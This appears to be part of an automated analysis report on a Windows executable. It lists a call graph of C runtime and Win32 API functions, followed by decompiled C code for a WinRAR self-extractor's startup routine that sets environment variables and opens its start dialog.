19976->19979 19978 421c8d GetACP 19977->19978 19977->19979 19978->19979 19979->19950 19979->19952 19981 421c4b getSystemCP 81 API calls 19980->19981 19982 421ce7 19981->19982 19984 421d36 IsValidCodePage 19982->19984 19987 421cf2 setSBCS 19982->19987 19989 421d5b _memset __setmbcp_nolock 19982->19989 19983 41e6de __write_nolock 5 API calls 19985 421eaa 19983->19985 19986 421d48 GetCPInfo 19984->19986 19984->19987 19985->19955 19985->19956 19986->19987 19986->19989 19987->19983 19993 421a14 GetCPInfo 19989->19993 20126 41eec9 LeaveCriticalSection 19990->20126 19992 422014 19992->19952 19994 421afa 19993->19994 19995 421a48 _memset 19993->19995 19999 41e6de __write_nolock 5 API calls 19994->19999 20003 425bac 19995->20003 20001 421ba5 19999->20001 20001->19989 20002 42274e ___crtLCMapStringA 104 API calls 20002->19994 20004 41d0c8 _LocaleUpdate::_LocaleUpdate 79 API calls 20003->20004 20005 425bbf 20004->20005 20013 4259f2 20005->20013 20008 42274e 20009 41d0c8 _LocaleUpdate::_LocaleUpdate 79 API calls 20008->20009 20010 422761 20009->20010 20079 4223a9 20010->20079 20014 425a13 GetStringTypeW 20013->20014 20017 425a3e 20013->20017 20015 425a33 GetLastError 20014->20015 20016 425a2b 20014->20016 20015->20017 20019 425a77 MultiByteToWideChar 20016->20019 20035 425b1f 20016->20035 20017->20016 20018 425b25 20017->20018 20041 425ef0 GetLocaleInfoA 20018->20041 20025 425aa4 20019->20025 20019->20035 20021 41e6de __write_nolock 5 API calls 20023 421ab5 20021->20023 20023->20008 20024 425b76 GetStringTypeA 20030 425b91 20024->20030 20024->20035 20026 425ab9 _memset ___convertcp 20025->20026 20027 41cf3e _malloc 69 API calls 20025->20027 20029 425af2 MultiByteToWideChar 20026->20029 20026->20035 20027->20026 20033 425b08 GetStringTypeW 20029->20033 20034 425b19 20029->20034 20031 41a506 __getptd_noexit 69 API calls 20030->20031 20031->20035 20033->20034 20037 422389 20034->20037 20035->20021 20038 4223a6 20037->20038 20039 422395 20037->20039 20038->20035 20039->20038 20040 41a506 __getptd_noexit 69 API calls 20039->20040 20040->20038 20042 425f23 20041->20042 20043 425f1e 20041->20043 20072 426f29 20042->20072 20045 41e6de __write_nolock 5 API calls 20043->20045 20046 425b49 20045->20046 20046->20024 20046->20035 20047 425f39 20046->20047 20048 426003 20047->20048 20049 425f79 GetCPInfo 20047->20049 20052 41e6de __write_nolock 5 API calls 20048->20052 20050 425f90 20049->20050 20051 425fee MultiByteToWideChar 20049->20051 20050->20051 20053 425f96 GetCPInfo 20050->20053 20051->20048 20056 425fa9 _strlen 20051->20056 20054 425b6a 20052->20054 20053->20051 20055 425fa3 20053->20055 20054->20024 20054->20035 20055->20051 20055->20056 20057 41cf3e _malloc 69 API calls 20056->20057 20061 425fdb _memset ___convertcp 20056->20061 20057->20061 20058 426038 MultiByteToWideChar 20059 426050 20058->20059 20060 42606f 20058->20060 20063 426057 WideCharToMultiByte 20059->20063 20064 426074 20059->20064 20062 422389 __freea 69 API calls 20060->20062 20061->20048 20061->20058 20062->20048 20063->20060 20065 426093 20064->20065 20066 42607f WideCharToMultiByte 20064->20066 20067 421328 __calloc_crt 69 API calls 20065->20067 20066->20060 20066->20065 20068 42609b 20067->20068 20068->20060 20069 4260a4 WideCharToMultiByte 20068->20069 20069->20060 20070 4260b6 20069->20070 20071 41a506 __getptd_noexit 69 API calls 20070->20071 20071->20060 20075 426efe 20072->20075 20076 426f17 20075->20076 20077 426ccf strtoxl 93 API calls 20076->20077 20078 426f24 20077->20078 20078->20043 20080 4223ca LCMapStringW 20079->20080 20083 4223e5 20079->20083 20081 4223ed GetLastError 20080->20081 20080->20083 20081->20083 20082 4225e3 20086 425ef0 ___ansicp 93 API calls 20082->20086 20083->20082 20084 42243f 20083->20084 20085 422458 MultiByteToWideChar 20084->20085 20102 4225da 20084->20102 20095 422485 20085->20095 20085->20102 20088 42260b 20086->20088 20087 41e6de __write_nolock 5 API calls 20089 421ad5 20087->20089 20090 422624 20088->20090 20091 4226ff LCMapStringA 20088->20091 20088->20102 20089->20002 20093 425f39 ___convertcp 76 API calls 20090->20093 20092 42265b 20091->20092 20096 422726 20092->20096 20101 41a506 __getptd_noexit 69 API calls 20092->20101 20098 422636 20093->20098 20094 4224d6 MultiByteToWideChar 20099 4225d1 20094->20099 20100 4224ef LCMapStringW 20094->20100 20097 41cf3e _malloc 69 API calls 20095->20097 20106 42249e ___convertcp 20095->20106 20096->20102 20108 41a506 __getptd_noexit 69 API calls 20096->20108 20097->20106 20098->20102 20103 422640 LCMapStringA 20098->20103 20104 422389 __freea 69 API calls 20099->20104 20100->20099 20105 422510 20100->20105 20101->20096 20102->20087 20103->20092 20111 422662 20103->20111 20104->20102 20107 422519 20105->20107 20110 422542 20105->20110 20106->20094 20106->20102 20107->20099 20109 42252b LCMapStringW 20107->20109 20108->20102 20109->20099 20113 42255d ___convertcp 20110->20113 20115 41cf3e _malloc 69 API calls 20110->20115 20114 422673 _memset ___convertcp 20111->20114 20116 41cf3e _malloc 69 API calls 20111->20116 20112 422591 LCMapStringW 20117 4225cb 20112->20117 20118 4225a9 WideCharToMultiByte 20112->20118 20113->20099 20113->20112 20114->20092 20120 4226b1 LCMapStringA 20114->20120 20115->20113 20116->20114 20119 422389 __freea 69 API calls 20117->20119 20118->20117 20119->20099 20122 4226d1 20120->20122 20123 4226cd 20120->20123 20124 425f39 ___convertcp 76 API calls 20122->20124 20125 422389 __freea 69 API calls 20123->20125 20124->20123 20125->20092 20126->19992 20128 4233df 20127->20128 20129 41e6ed __encode_pointer 7 API calls 20128->20129 20130 4233f7 20128->20130 20129->20128 20130->19531 20132 410e2b GetProcAddress 20131->20132 20133 40ff03 OleInitialize 20131->20133 20132->20133 20134 410e3b 20132->20134 20135 411f56 GetCPInfo 20133->20135 20134->20133 20136 411f7a IsDBCSLeadByte 20135->20136 20136->20136 20137 411f92 20136->20137 20137->19544 20144 40d66f 20138->20144 20139 40d77a 20139->19553 20139->19554 20140 40d6a4 CharUpperW 20140->20144 20141 40d72b CharUpperW 20141->20144 20142 40d6cb CharUpperW 20142->20144 20143 40d033 126 API calls 20143->20144 20144->20139 20144->20140 20144->20141 20144->20142 20144->20143 20146 40d626 20145->20146 20147 40d645 20146->20147 20148 40d63d SetEnvironmentVariableW 20146->20148 20147->19546 20148->20147 20150 41a9f7 __vswprintf_c_l 103 API calls 20149->20150 20151 40bc2e SetEnvironmentVariableW GetModuleHandleW LoadIconW LoadBitmapW 20150->20151 20152 41a060 LoadLibraryW LoadLibraryW OleInitialize InitCommonControlsEx SHGetMalloc 20151->20152 20152->19556 20168 40bc32 20153->20168 20155 40c3b4 20191 40c0f6 GetModuleHandleW FindResourceW 20155->20191 20157 40c3bb 20157->19562 20159 410073 20158->20159 20160 419dd9 GetDC 20158->20160 20159->19566 20160->20159 20161 419de8 GetDeviceCaps ReleaseDC 20160->20161 20161->20159 20163 41a0ca FreeLibrary 20162->20163 20164 41a0cd 20162->20164 20163->20164 20169 40bc3c __EH_prolog _wcschr __write_nolock 20168->20169 20170 40bc5f GetModuleFileNameW 20169->20170 20171 40bc88 _wcscpy 20169->20171 20172 40bc7b _wcsrchr 20170->20172 20195 4087c3 20171->20195 20172->20171 20190 40bcbc ctype 20172->20190 20174 40bdf2 20176 408fed 126 API calls 20174->20176 20174->20190 20177 40be0e 20176->20177 20179 41cf3e _malloc 69 API calls 20177->20179 20180 40be18 20179->20180 20181 408e7b 127 API calls 20180->20181 20180->20190 20183 40be34 20181->20183 20185 41cf3e _malloc 69 API calls 20183->20185 20183->20190 20184 40bcb8 ctype _strncmp 20184->20174 20184->20190 20204 408bae 20184->20204 20212 408e7b 20184->20212 20220 408fed 20184->20220 20190->20155 20192 40c124 20191->20192 20193 40c11e 20191->20193 20303 40bf1d 20192->20303 20193->20157 20196 4087cd __write_nolock 20195->20196 20197 40882d CreateFileW 20196->20197 20198 40885d GetLastError 20197->20198 20200 4088af 20197->20200 20227 40a3dc 20198->20227 20200->20184 20201 40887d 20201->20200 20202 408881 CreateFileW GetLastError 20201->20202 20203 4088a6 20202->20203 20203->20200 20205 408bc0 20204->20205 20206 408bd3 SetFilePointer 20204->20206 20207 408c0b ___inittime 20205->20207 20247 406402 20205->20247 20206->20207 20208 408bee GetLastError 20206->20208 20207->20184 20208->20207 20210 408bf8 20208->20210 20210->20207 20211 406402 122 API calls 20210->20211 20211->20207 20214 408e93 20212->20214 20215 408ef5 20214->20215 20216 408ee0 20214->20216 20219 408eeb 20214->20219 20257 408ca0 20214->20257 20218 408ca0 5 API calls 20215->20218 20215->20219 20269 40653a 20216->20269 20218->20215 20219->20184 20287 408f4b 20220->20287 20223 409018 20223->20184 20224 406402 122 API calls 20224->20223 20228 40a3e9 __write_nolock 20227->20228 20236 40a3f3 _wcslen _wcscpy _wcsncpy 20228->20236 20237 40a0ea 20228->20237 20230 40a402 _wcslen 20240 40a2f5 20230->20240 20232 40a411 20236->20201 20244 410b52 20237->20244 20241 40a300 20240->20241 20242 40a0ea CharUpperW 20241->20242 20243 40a30d 20241->20243 20242->20243 20243->20232 20245 40a0f8 20244->20245 20246 410b5f CharUpperW 20244->20246 20245->20230 20246->20245 20248 406416 20247->20248 20249 40640b 20247->20249 20253 4062fd 20248->20253 20250 406376 ctype 121 API calls 20249->20250 20250->20248 20254 40630c 20253->20254 20255 406329 20254->20255 20256 41c77f __CxxThrowException@8 RaiseException 20254->20256 20255->20206 20256->20255 20258 408cba ReadFile 20257->20258 20259 408caf GetStdHandle 20257->20259 20260 408cd3 20258->20260 20261 408cf3 20258->20261 20259->20258 20274 408c5a 20260->20274 20261->20214 20263 408cda 20264 408ce8 20263->20264 20278 40652c 20269->20278 20275 408c62 20274->20275 20276 408c65 GetFileType 20274->20276 20275->20263 20277 408c71 20276->20277 20277->20263 20281 406497 20278->20281 20284 40639f 20281->20284 20285 41170e ctype 121 API calls 20284->20285 20288 408f58 20287->20288 20291 408fb4 20287->20291 20289 408f89 SetFilePointer 20288->20289 20292 408f74 20288->20292 20294 408e03 20288->20294 20290 408faa GetLastError 20289->20290 20289->20291 20290->20291 20291->20223 20291->20224 20292->20289 20295 408e0d __EH_prolog 20294->20295 20300 40117b 20295->20300 20302 408bae 124 API calls 20300->20302 20301 401189 20302->20301 20304 40bf2a ctype __write_nolock 20303->20304 20307 40bf85 ctype _strlen 20304->20307 20310 40bfe4 _wcsrchr _wcscpy _wcschr ctype _wcsncpy 20304->20310 20311 411afd WideCharToMultiByte 20304->20311 20305 411afd ctype WideCharToMultiByte 20308 40bfb2 ctype _strlen 20305->20308 20307->20305 20309 40bc16 _swprintf 103 API calls 20308->20309 20309->20310 20310->20193 20312 411b27 20311->20312 20312->20307 18810 42993a 18815 405512 18810->18815 18816 40551c __EH_prolog 18815->18816 18834 40a026 18816->18834 18821 410d8e 69 API calls 18822 405546 18821->18822 18823 410d8e 69 API calls 18822->18823 18824 405555 18823->18824 18825 410d8e 69 API calls 18824->18825 18826 405564 18825->18826 18827 410d8e 69 API calls 18826->18827 18828 405573 18827->18828 18843 405394 18828->18843 18835 40a030 __EH_prolog 18834->18835 18856 40d0e6 18835->18856 18840 410d8e 18995 410d00 18840->18995 18844 409f85 2 API calls 18843->18844 18845 40539c 18844->18845 18846 410d00 69 API calls 18845->18846 18847 4053c9 18846->18847 18848 410d00 69 API calls 18847->18848 18849 4053d4 18848->18849 18850 410d00 69 API calls 18849->18850 18851 4053df 18850->18851 18852 410d00 69 API calls 18851->18852 18853 4053ea 18852->18853 18854 410d00 69 API calls 18853->18854 18855 4053f5 18854->18855 18863 40d033 18856->18863 18858 40a042 18859 409f85 18858->18859 18860 409f95 _memset 18859->18860 18990 410f12 18860->18990 18864 40d059 _wcslen 18863->18864 18865 40d042 _memset 18863->18865 18867 40cfb9 18864->18867 18865->18858 18868 40cfca _realloc 18867->18868 18871 40cef5 18868->18871 18872 40cf04 18871->18872 18873 40cf0e 18871->18873 18881 40ceb6 18872->18881 18875 40cf7c GetCurrentProcessId 18873->18875 18876 40cf31 18873->18876 18880 40cf5e 18875->18880 18876->18880 18885 406423 18876->18885 18878 40cf4c __init_pointers 18890 406371 18878->18890 18880->18865 18882 40ceef 18881->18882 18883 40cebf LoadLibraryW 18881->18883 18882->18873 18883->18882 18884 40ced0 GetProcAddress GetProcAddress 18883->18884 18884->18882 18894 41a9f7 18885->18894 18892 4062fd 18890->18892 18891 406329 18891->18880 18892->18891 18987 41c77f 18892->18987 18900 41a8ff 18894->18900 18897 406376 18942 41170e 18897->18942 18899 40639b 18899->18878 18901 41a92f 18900->18901 18902 41a90f 18900->18902 18905 41a93f 18901->18905 18910 41a95f 18901->18910 18915 41edae 18902->18915 18907 41edae __calloc_impl 69 API calls 18905->18907 18908 41a944 18907->18908 18909 420103 __calloc_impl 7 API calls 18908->18909 18913 406446 18909->18913 18911 41a9a6 18910->18911 18910->18913 18921 41fe68 18910->18921 18911->18913 18914 41fe68 __flsbuf 103 API calls 18911->18914 18913->18897 18914->18913 18916 41e93b __getptd_noexit 69 API calls 18915->18916 18917 41a914 18916->18917 18918 420103 18917->18918 18919 41e768 __decode_pointer 7 API calls 18918->18919 18920 420113 __invoke_watson 18919->18920 18922 424df7 __fileno 69 API calls 18921->18922 18923 41fe78 18922->18923 18924 41fe83 18923->18924 18925 41fe9a 18923->18925 18927 41edae __calloc_impl 69 API calls 18924->18927 18926 41fe9e 18925->18926 18936 41feab __flsbuf 18925->18936 18928 41edae __calloc_impl 69 API calls 18926->18928 18935 41fe88 18927->18935 18928->18935 18929 41ff0c 18930 41ff9b 18929->18930 18931 41ff1b 18929->18931 18932 424c6e __locking 103 API calls 18930->18932 18933 41ff32 18931->18933 18939 41ff4f 18931->18939 18932->18935 18934 424c6e __locking 103 API calls 18933->18934 18934->18935 18935->18911 18936->18929 18936->18935 18937 424d93 __write_nolock 69 API calls 18936->18937 18938 41ff01 18936->18938 18937->18938 18938->18929 18941 424d4a __getbuf 69 API calls 18938->18941 18939->18935 18940 424422 __lseeki64 73 API calls 18939->18940 18940->18935 18941->18929 18944 41171d 18942->18944 18958 41176a 18942->18958 18943 41181c 18948 41176f 18943->18948 18949 411796 18943->18949 18953 41178c 18943->18953 18943->18958 18944->18943 18947 4117b3 18944->18947 18944->18948 18944->18949 18950 4117df 18944->18950 18951 411763 18944->18951 18944->18953 18956 411742 18944->18956 18944->18958 18945 40c3bf ctype 106 API calls 18952 41179d 18945->18952 18946 40c3bf ctype 106 API calls 18946->18956 18947->18946 18980 40c3bf 18948->18980 18961 40c3bf ctype 106 API calls 18949->18961 18957 40c3bf ctype 106 API calls 18950->18957 18975 40d3ac 18951->18975 18954 40e283 ctype 118 API calls 18952->18954 18953->18945 18953->18958 18954->18958 18966 40e283 18956->18966 18960 4117ef 18957->18960 18958->18899 18964 40e283 ctype 118 API calls 18960->18964 18961->18952 18965 4117f7 18964->18965 18965->18899 18967 40e2d4 18966->18967 18968 40e28c 18966->18968 18967->18899 18968->18967 18969 40e296 GetLastError 18968->18969 18970 41a9f7 __vswprintf_c_l 103 API calls 18969->18970 18971 40e2bb 18970->18971 18972 40d3ac ctype 13 API calls 18971->18972 18973 40e2c6 18972->18973 18973->18967 18974 40e2cd SetLastError 18973->18974 18974->18967 18976 40d3b9 __write_nolock 18975->18976 18977 40d3e6 18976->18977 18978 40d3c6 wvsprintfW 18976->18978 18977->18958 18979 40d298 ctype 12 API calls 18978->18979 18979->18977 18981 40c3cf ctype 18980->18981 18982 40c404 LoadStringW 18981->18982 18983 40c416 LoadStringW 18981->18983 18982->18983 18984 40c424 18982->18984 18983->18984 18985 40bf1d ctype 104 API calls 18984->18985 18986 40c432 18985->18986 18986->18956 18988 41c7b4 RaiseException 18987->18988 18989 41c7a8 18987->18989 18988->18891 18989->18988 18993 410edb GetCurrentProcess GetProcessAffinityMask 18990->18993 18994 405528 18993->18994 18994->18840 18998 401b67 18995->18998 18999 401b70 18998->18999 19000 401b76 18998->19000 19002 41a506 18999->19002 19000->18821 19004 41a512 __calloc_impl 19002->19004 19003 41a58b __dosmaperr __calloc_impl 19003->19000 19004->19003 19014 41a551 19004->19014 19015 41efa3 19004->19015 19005 41a566 RtlFreeHeap 19005->19003 19007 41a578 19005->19007 19008 41edae __calloc_impl 67 API calls 19007->19008 19009 41a57d GetLastError 19008->19009 19009->19003 19010 41a543 19029 41a55c 19010->19029 19011 41a529 ___sbh_find_block 19011->19010 19022 41f006 19011->19022 19014->19003 19014->19005 19016 41efb8 19015->19016 19017 41efcb EnterCriticalSection 19015->19017 19032 41eee0 19016->19032 19017->19011 19019 41efbe 19019->19017 19058 421495 19019->19058 19024 41f045 19022->19024 19028 41f2e7 19022->19028 19023 41f231 VirtualFree 19025 41f295 19023->19025 19024->19023 19024->19028 19026 41f2a4 VirtualFree HeapFree 19025->19026 19025->19028 19262 41cb50 19026->19262 19028->19010 19266 41eec9 LeaveCriticalSection 19029->19266 19031 41a563 19031->19014 19033 41eeec __calloc_impl 19032->19033 19046 41ef12 19033->19046 19065 421948 19033->19065 19039 41ef43 19045 41efa3 __lock 69 API calls 19039->19045 19040 41ef34 19044 41edae __calloc_impl 69 API calls 19040->19044 19041 41ef22 __calloc_impl 19041->19019 19044->19041 19047 41ef4a 19045->19047 19046->19041 19111 4212e3 19046->19111 19048 41ef52 19047->19048 19049 41ef7e 19047->19049 19117 4241e6 19048->19117 19050 41a506 __getptd_noexit 69 API calls 19049->19050 19052 41ef6f 19050->19052 19121 41ef9a 19052->19121 19053 41ef5d 19053->19052 19054 41a506 __getptd_noexit 69 API calls 19053->19054 19056 41ef69 19054->19056 19057 41edae __calloc_impl 69 API calls 19056->19057 19057->19052 19059 421948 __FF_MSGBANNER 69 API calls 19058->19059 19060 42149f 19059->19060 19061 42179d __NMSG_WRITE 69 API calls 19060->19061 19062 4214a7 19061->19062 19063 41e768 __decode_pointer 7 API calls 19062->19063 19064 41efca 19063->19064 19064->19017 19124 4259a7 19065->19124 19067 42194f 19068 4259a7 __set_error_mode 69 API calls 19067->19068 19072 42195c 19067->19072 19068->19072 19069 42179d __NMSG_WRITE 69 API calls 19070 421974 19069->19070 19073 42179d __NMSG_WRITE 69 API calls 19070->19073 19071 41ef01 19074 42179d 19071->19074 19072->19069 19072->19071 19073->19071 19075 4217b1 19074->19075 19076 4259a7 __set_error_mode 66 API calls 19075->19076 19107 41ef08 19075->19107 19077 4217d3 19076->19077 19078 421911 GetStdHandle 19077->19078 19079 4259a7 __set_error_mode 66 API calls 19077->19079 19080 42191f _strlen 19078->19080 19078->19107 19082 4217e4 19079->19082 19083 421938 WriteFile 19080->19083 19080->19107 19081 4217f6 19081->19107 19130 422896 19081->19130 19082->19078 19082->19081 19083->19107 19086 42182c GetModuleFileNameA 19088 42184a 19086->19088 19093 42186d _strlen 19086->19093 19090 422896 _strcpy_s 66 API calls 19088->19090 19091 42185a 19090->19091 19091->19093 19094 41ffdb __invoke_watson 10 API calls 19091->19094 19092 4218b0 19155 42587e 19092->19155 19093->19092 19146 4258f2 19093->19146 19094->19093 19099 4218d4 19101 42587e _strcat_s 66 API calls 19099->19101 19100 41ffdb __invoke_watson 10 API calls 19100->19099 19103 4218e8 19101->19103 19102 41ffdb __invoke_watson 10 API calls 19102->19092 19104 4218f9 19103->19104 19105 41ffdb __invoke_watson 10 API calls 19103->19105 19164 425715 19104->19164 19105->19104 19108 4214e9 19107->19108 19228 4214be GetModuleHandleW 19108->19228 19114 4212ec 19111->19114 19113 41ef2d 19113->19039 19113->19040 19114->19113 19115 421303 Sleep 19114->19115 19231 41cf3e 19114->19231 19116 421318 19115->19116 19116->19113 19116->19114 19260 41fa9c 19117->19260 19119 4241f2 InitializeCriticalSectionAndSpinCount 19120 424236 __calloc_impl 19119->19120 19120->19053 19261 41eec9 LeaveCriticalSection 19121->19261 19123 41efa1 19123->19041 19125 4259b6 19124->19125 19126 41edae __calloc_impl 69 API calls 19125->19126 19129 4259c0 19125->19129 19127 4259d9 19126->19127 19128 420103 __calloc_impl 7 API calls 19127->19128 19128->19129 19129->19067 19131 4228a7 19130->19131 19132 4228ae 19130->19132 19131->19132 19137 4228d4 19131->19137 19133 41edae __calloc_impl 69 API calls 19132->19133 19134 4228b3 19133->19134 19135 420103 __calloc_impl 7 API calls 19134->19135 19136 421818 19135->19136 19136->19086 19139 41ffdb 19136->19139 19137->19136 19138 41edae __calloc_impl 69 API calls 19137->19138 19138->19134 19191 41a820 19139->19191 19141 420008 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19142 4200e4 GetCurrentProcess TerminateProcess 19141->19142 19143 4200d8 __invoke_watson 19141->19143 19193 41e6de 19142->19193 19143->19142 19145 420101 19145->19086 19150 425904 19146->19150 19147 425908 19148 42189d 19147->19148 19149 41edae __calloc_impl 69 API calls 19147->19149 19148->19092 19148->19102 19151 425924 19149->19151 19150->19147 19150->19148 19153 42594e 19150->19153 19152 420103 __calloc_impl 7 API calls 19151->19152 19152->19148 19153->19148 19154 41edae __calloc_impl 69 API calls 19153->19154 19154->19151 19156 425896 19155->19156 19159 42588f 19155->19159 19157 41edae __calloc_impl 69 API calls 19156->19157 19158 42589b 19157->19158 19160 420103 __calloc_impl 7 API calls 19158->19160 19159->19156 19161 4258ca 19159->19161 19162 4218c3 19160->19162 19161->19162 19163 41edae __calloc_impl 69 API calls 19161->19163 19162->19099 19162->19100 19163->19158 19201 41e75f 19164->19201 19167 425738 LoadLibraryA 19168 425862 19167->19168 19169 42574d GetProcAddress 19167->19169 19168->19107 19169->19168 19172 425763 19169->19172 19170 4257ea 19174 41e768 __decode_pointer 7 API calls 19170->19174 19188 425815 19170->19188 19171 4257c0 19171->19170 19216 41e768 TlsGetValue 19171->19216 19204 41e6ed TlsGetValue 19172->19204 19173 41e768 __decode_pointer 7 API calls 19173->19168 19184 42582d 19174->19184 19179 41e768 __decode_pointer 7 API calls 19179->19170 19180 41e6ed __encode_pointer 7 API calls 19181 42577e GetProcAddress 19180->19181 19182 41e6ed __encode_pointer 7 API calls 19181->19182 19183 425793 GetProcAddress 19182->19183 19185 41e6ed __encode_pointer 7 API calls 19183->19185 19186 41e768 __decode_pointer 7 API calls 19184->19186 19184->19188 19187 4257a8 19185->19187 19186->19188 19187->19171 19189 4257b2 GetProcAddress 19187->19189 19188->19173 19190 41e6ed __encode_pointer 7 API calls 19189->19190 19190->19171 19192 41a82c __VEC_memzero 19191->19192 19192->19141 19194 41e6e6 19193->19194 19195 41e6e8 IsDebuggerPresent 19193->19195 19194->19145 19197 424e29 __invoke_watson 19195->19197 19198 423f50 SetUnhandledExceptionFilter UnhandledExceptionFilter 19197->19198 19199 423f75 GetCurrentProcess TerminateProcess 19198->19199 19200 423f6d __invoke_watson 19198->19200 19199->19145 19200->19199 19202 41e6ed __encode_pointer 7 API calls 19201->19202 19203 41e766 19202->19203 19203->19167 19203->19171 19205 41e705 19204->19205 19206 41e726 GetModuleHandleW 19204->19206 19205->19206 19207 41e70f TlsGetValue 19205->19207 19208 41e741 GetProcAddress 19206->19208 19209 41e736 19206->19209 19214 41e71a 19207->19214 19210 41e71e 19208->19210 19211 421465 __crt_waiting_on_module_handle Sleep GetModuleHandleW 19209->19211 19212 41e751 RtlEncodePointer 19210->19212 19213 41e759 GetProcAddress 19210->19213 19215 41e73c 19211->19215 19212->19213 19213->19180 19214->19206 19214->19210 19215->19208 19215->19213 19217 41e7a1 GetModuleHandleW 19216->19217 19218 41e780 19216->19218 19220 41e7b1 19217->19220 19221 41e7bc GetProcAddress 19217->19221 19218->19217 19219 41e78a TlsGetValue 19218->19219 19224 41e795 19219->19224 19222 421465 __crt_waiting_on_module_handle Sleep GetModuleHandleW 19220->19222 19223 41e799 19221->19223 19225 41e7b7 19222->19225 19226 41e7d4 19223->19226 19227 41e7cc RtlDecodePointer 19223->19227 19224->19217 19224->19223 19225->19221 19225->19226 19226->19179 19227->19226 19229 4214d2 GetProcAddress 19228->19229 19230 4214e2 ExitProcess 19228->19230 19229->19230 19232 41cff1 19231->19232 19238 41cf50 19231->19238 19233 41fc9b __calloc_impl 7 API calls 19232->19233 19234 41cff7 19233->19234 19236 41edae __calloc_impl 68 API calls 19234->19236 19235 421948 __FF_MSGBANNER 68 API calls 19242 41cf61 19235->19242 19237 41cfe9 19236->19237 19237->19114 19238->19237 19241 41cfad RtlAllocateHeap 19238->19241 19238->19242 19244 41cfdd 19238->19244 19247 41cfe2 19238->19247 19249 41ceef 19238->19249 19257 41fc9b 19238->19257 19240 42179d __NMSG_WRITE 68 API calls 19240->19242 19241->19238 19242->19235 19242->19238 19242->19240 19243 4214e9 _malloc 3 API calls 19242->19243 19243->19242 19246 41edae __calloc_impl 68 API calls 19244->19246 19246->19247 19248 41edae __calloc_impl 68 API calls 19247->19248 19248->19237 19250 41cefb __calloc_impl 19249->19250 19251 41efa3 __lock 69 API calls 19250->19251 19253 41cf2c __calloc_impl 19250->19253 19252 41cf11 19251->19252 19254 41f7b5 ___sbh_alloc_block 5 API calls 19252->19254 19253->19238 19255 41cf1c 19254->19255 19256 41cf35 _malloc LeaveCriticalSection 19255->19256 19256->19253 19258 41e768 __decode_pointer 7 API calls 19257->19258 19259 41fcab 19258->19259 19259->19238 19260->19119 19261->19123 19263 41cb68 19262->19263 19264 41cb97 19263->19264 19265 41cb8f __VEC_memcpy 19263->19265 19264->19028 19265->19264 19266->19031

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 83%
                                                                                              			E0040FEF0(void* __edx, void* __eflags) {
                                                                                              				void* _v8;
                                                                                              				char _v12;
                                                                                              				struct _SYSTEMTIME _v28;
                                                                                              				intOrPtr _v40;
                                                                                              				char _v72;
                                                                                              				intOrPtr _v84;
                                                                                              				char _v116;
                                                                                              				short _v216;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				void* _t42;
                                                                                              				struct HBITMAP__* _t43;
                                                                                              				void* _t57;
                                                                                              				long _t59;
                                                                                              				intOrPtr _t60;
                                                                                              				intOrPtr _t61;
                                                                                              				void* _t70;
                                                                                              				void* _t76;
                                                                                              				void* _t90;
                                                                                              				void* _t91;
                                                                                              				WCHAR* _t92;
                                                                                              				struct HINSTANCE__* _t94;
                                                                                              				void* _t97;
                                                                                              				void* _t98;
                                                                                              				void* _t103;
                                                                                              				void* _t104;
                                                                                              				void* _t105;
                                                                                              				intOrPtr _t115;
                                                                                              
                                                                                              				_t90 = __edx;
                                                                                              				E00410E1C(1);
                                                                                              				__imp__OleInitialize(0, _t91, _t98, _t76); // executed
                                                                                              				E00411F56(0x44f5b0);
                                                                                              				E0041A820(_t91, 0x43a820, 0, 0x7002);
                                                                                              				_t105 = _t104 + 0xc;
                                                                                              				_t92 = GetCommandLineW();
                                                                                              				_t108 = _t92;
                                                                                              				if(_t92 != 0) {
                                                                                              					E0040D64B(_t108, _t92);
                                                                                              					if( *0x441879 == 0) {
                                                                                              						E0040D5F7(__eflags, _t92); // executed
                                                                                              					} else {
                                                                                              						_t70 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
                                                                                              						_v8 = _t70;
                                                                                              						if(_t70 != 0) {
                                                                                              							_t97 = MapViewOfFile(_t70, 0xf001f, 0, 0, 0x7002);
                                                                                              							_t111 = _t97;
                                                                                              							if(_t97 != 0) {
                                                                                              								E0041C290(0, _t97, 0x7002, 0x43a820, _t97, 0x7002);
                                                                                              								_t105 = _t105 + 0xc;
                                                                                              								 *_t97 = 1;
                                                                                              								E0040D5F7(_t111, 0x43a822);
                                                                                              							}
                                                                                              							UnmapViewOfFile(_t97);
                                                                                              						}
                                                                                              						CloseHandle(_v8);
                                                                                              					}
                                                                                              				}
                                                                                              				GetModuleFileNameW(0, 0x439820, 0x800);
                                                                                              				SetEnvironmentVariableW(L"sfxname", 0x439820); // executed
                                                                                              				GetLocalTime( &_v28);
                                                                                              				_push(_v28.wMilliseconds & 0x0000ffff);
                                                                                              				_push(_v28.wSecond & 0x0000ffff);
                                                                                              				_push(_v28.wMinute & 0x0000ffff);
                                                                                              				_push(_v28.wHour & 0x0000ffff);
                                                                                              				_push(_v28.wDay & 0x0000ffff);
                                                                                              				_push(_v28.wMonth & 0x0000ffff);
                                                                                              				E0040BC16( &_v216, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d", _v28.wYear & 0x0000ffff);
                                                                                              				SetEnvironmentVariableW(L"sfxstime",  &_v216);
                                                                                              				_t94 = GetModuleHandleW(0);
                                                                                              				 *0x4335a4 = _t94;
                                                                                              				 *0x4335a8 = _t94; // executed
                                                                                              				_t42 = LoadIconW(_t94, 0x64); // executed
                                                                                              				 *0x43981c = _t42; // executed
                                                                                              				_t43 = LoadBitmapW( *0x4335a8, 0x65); // executed
                                                                                              				 *0x439818 = _t43; // executed
                                                                                              				E0041A060( &_v12); // executed
                                                                                              				E0040C3A8(0x4335bc, _t90, _t103, 0x439820);
                                                                                              				E00419137( &_v116);
                                                                                              				E00419137( &_v72);
                                                                                              				_v84 = E00419DD0(0x64);
                                                                                              				_v40 = E00419DD0(0x64);
                                                                                              				 *0x438814 =  &_v116;
                                                                                              				 *0x438810 =  &_v72; // executed
                                                                                              				DialogBoxParamW(_t94, L"STARTDLG", 0, E0040F58D, 0); // executed
                                                                                              				 *0x438810 = 0;
                                                                                              				 *0x438814 = 0;
                                                                                              				E0041915C( &_v72);
                                                                                              				E0041915C( &_v116);
                                                                                              				E0041A0BA();
                                                                                              				if( *0x441870 != 0) {
                                                                                              					E0040D896(_t94);
                                                                                              				}
                                                                                              				E0040D0FE(0x44ce20);
                                                                                              				_t113 =  *0x441858;
